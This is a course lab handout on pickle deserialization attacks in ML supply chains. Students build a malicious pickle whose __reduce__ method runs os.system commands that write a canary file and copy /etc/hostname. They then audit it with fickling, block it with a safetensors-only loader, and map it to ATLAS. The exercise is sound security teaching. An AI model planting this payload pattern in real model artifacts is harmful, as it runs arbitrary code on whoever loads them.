Lab 3: ML Supply Chain — Pickle Deserialization and Artifact Validation · AI-201

Module: 3 — ML Supply Chain Attacks (CVE-2025-68664)
Points: 20
Time estimate: 2 hr lab + 1 hr independent
Deliverable: lab-3-report.md + lab3/ directory with artifacts

Objectives

Construct a malicious pickle payload that executes arbitrary code on deserialization.
Use fickling to audit a .pkl file and interpret its output.
Implement a safe-loading control using safetensors and validate it blocks the malicious payload.
Map the attack to ATLAS AML.T0010 (ML Supply Chain Compromise).

Setup

# Pyodide (in-browser) or local Python 3.11+
pip install fickling safetensors torch numpy

For the Pyodide path, open the lab notebook in your browser. The fickling and safetensors packages are available in the course Pyodide environment.

Part A: Construct the Malicious Payload (45 min)

You will build a .pkl file that, when deserialized, writes a canary file to /tmp/pwned.txt. This simulates the behavior of CVE-2025-68664 where model artifacts loaded without validation execute attacker code.

import pickle
import os

class MaliciousPayload:
    """
    This class demonstrates the __reduce__ deserialization exploit.
    __reduce__ is called by pickle during deserialization.
    The attacker controls the callable and its arguments.
    """
    def __reduce__(self):
        # pickle will call: os.system("...")
        return (os.system, ("echo 'PWNED by pickle' > /tmp/pwned.txt",))

# Serialize
payload = MaliciousPayload()
with open("lab3/malicious_model.pkl", "wb") as f:
    pickle.dump(payload, f)

print("Payload written. Size:", os.path.getsize("lab3/malicious_model.pkl"), "bytes")

Step 1: Run this code. Verify the file is created.

Step 2: Load the file with the naive loader pattern (what vulnerable applications do):

# VULNERABLE LOADING PATTERN -- for demonstration only
with open("lab3/malicious_model.pkl", "rb") as f:
    obj = pickle.load(f)   # triggers __reduce__ on deserialization

# Verify canary was written
import os
print("Canary written:", os.path.exists("/tmp/pwned.txt"))
with open("/tmp/pwned.txt") as f:
    print(f.read())

Record: did the canary appear?

Step 3: Extend the payload to do something more illustrative — instead of writing a file, have it collect the content of /etc/hostname and write it to /tmp/exfil.txt. This models the data-exfiltration pattern from CVE-2025-68664.

class ExfilPayload:
    def __reduce__(self):
        cmd = "cat /etc/hostname > /tmp/exfil.txt"
        return (os.system, (cmd,))

Serialize, load, verify. Record results.

Part B: Fickling Audit (30 min)

fickling is the canonical tool for static analysis of pickle files.

# Audit the malicious file
fickling lab3/malicious_model.pkl

# Fickling's output includes:
# - Pickle opcodes decoded to human-readable form
# - The callable being invoked on REDUCE
# - A safety verdict

# Also try the Python API
python3 -c "
import fickling
result = fickling.check('lab3/malicious_model.pkl')
print('Safe:', result.is_likely_safe)
print('Findings:', result.issues)
"

Complete this analysis table in your report:

| Pickle opcode | What it does | Present in malicious_model.pkl? |
|---|---|---|
| REDUCE         | Calls a callable with args | Yes/No |
| GLOBAL         | Imports a module/attribute | Yes/No |
| INST           | Creates a class instance  | Yes/No |
| NEWOBJ         | Creates via __new__       | Yes/No |
| BUILD          | Calls __setstate__        | Yes/No |

Also record: What specific callable does fickling identify in your malicious file? Does it report it as unsafe?

Now create a "benign" pickle: serialize a plain Python dict {"model_version": "1.0", "weights": [0.1, 0.2, 0.3]}. Run fickling on it. Record: does fickling flag it? What is the opcode signature of a benign pickle vs. a malicious one?

Part C: Safe-Loading Defense (45 min)

The defense against pickle deserialization attacks is format-level: use safetensors instead of .pkl for model weights.

Step 1: Save a simple tensor with safetensors:

import torch
from safetensors.torch import save_file, load_file

# Create a fake model weights dict
weights = {
    "layer1.weight": torch.randn(10, 5),
    "layer1.bias": torch.zeros(10),
    "layer2.weight": torch.randn(3, 10),
}

save_file(weights, "lab3/safe_model.safetensors")
print("Saved. Size:", os.path.getsize("lab3/safe_model.safetensors"), "bytes")

Step 2: Verify the format cannot carry executable payload:

# Attempt to embed a malicious callable in safetensors
# (spoiler: it can't -- safetensors is a pure tensor serialization format)

# Load the safe file
loaded = load_file("lab3/safe_model.safetensors")
print("Loaded keys:", list(loaded.keys()))
print("Layer1 shape:", loaded["layer1.weight"].shape)

Step 3: Write a validator function that rejects .pkl files and only accepts .safetensors:

def safe_load_model(filepath: str) -> dict:
    """
    Load model weights from a safetensors file only.
    Rejects .pkl and any other format.
    """
    if not filepath.endswith(".safetensors"):
        raise ValueError(
            f"Rejected {filepath}: only .safetensors format is accepted. "
            f"Pickle (.pkl, .pt, .pth) files may execute arbitrary code on load."
        )
    
    from safetensors.torch import load_file
    return load_file(filepath)

# Test the validator
try:
    safe_load_model("lab3/malicious_model.pkl")
    print("ERROR: should have been rejected")
except ValueError as e:
    print("Correctly rejected:", e)

# Verify safe file loads
weights = safe_load_model("lab3/safe_model.safetensors")
print("Safe file loaded:", list(weights.keys()))

Record: does the validator block the malicious file? Does it load the safe file?

Part D: ATLAS Mapping (20 min)

In your lab report, write a structured ATLAS case study entry for CVE-2025-68664:

## ATLAS Case Study: CVE-2025-68664 (LangGrinch)

**Tactic:** Initial Access
**Technique:** AML.T0010 — ML Supply Chain Compromise
**CVSS:** 9.3 (Critical)

### Attack narrative
[2-3 sentences: what the attacker does, what the target does, what the outcome is]

### Attack preconditions
[List 3 conditions that must hold for this attack to work]

### Detection opportunity
[What would a defender see in logs or filesystem that would indicate this attack occurred?]

### Mitigation
[What control prevents this? At what layer does it operate?]

### Severity context
[Why is CVSS 9.3 — what is the blast radius?]

Lab Report

Create lab-3-report.md with:

Canary and exfil evidence (screenshots or terminal output paste)
Fickling opcode analysis table (completed)
Safe-loading validator test results
ATLAS case study entry (Part D)
One paragraph: why pickle is not a safe format for untrusted model artifacts, in your own words

Grading

Component	Points
Malicious payload: canary and exfil both demonstrated	4
Fickling analysis: opcode table completed, benign vs. malicious comparison	4
Safe-loading validator: blocks .pkl, loads .safetensors, correct error message	5
ATLAS case study: all five sections filled with specificity	5
Closing paragraph: accurately explains the format-level issue	2
Total	20